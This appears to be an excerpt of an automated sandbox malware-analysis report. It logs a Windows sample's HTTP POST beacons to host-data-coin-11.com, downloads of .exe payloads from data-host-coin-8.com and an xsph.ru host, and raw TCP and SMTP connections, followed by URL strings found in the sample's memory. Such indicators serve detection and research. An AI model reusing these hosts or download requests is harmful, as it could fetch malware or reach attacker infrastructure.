Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pgctyuwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://surulybuu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thylpwqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rhglrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dbxsgfe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aoavvcteey.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tqnyuoui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nqlstnrw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cbwqss.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://toosx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dokqsat.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pipoxpya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wbrirc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dwskrgjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pwahu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xnfmckfat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://htagjvn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /45512.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nadbxcytci.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvnyptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: host-data-coin-11.com

Source: global traffic	TCP traffic: 192.168.2.4:49807 -> 185.7.214.171:8080
Source: global traffic	TCP traffic: 192.168.2.4:49908 -> 86.107.197.138:38133

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic

TCP traffic: 192.168.2.4:49829 -> 40.93.212.0:25

Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: WerFault.exe, 00000012.00000003.793911909.00000000010E9000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.796410725.00000000010E9000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.828113364.00000188ABAEB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: 8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
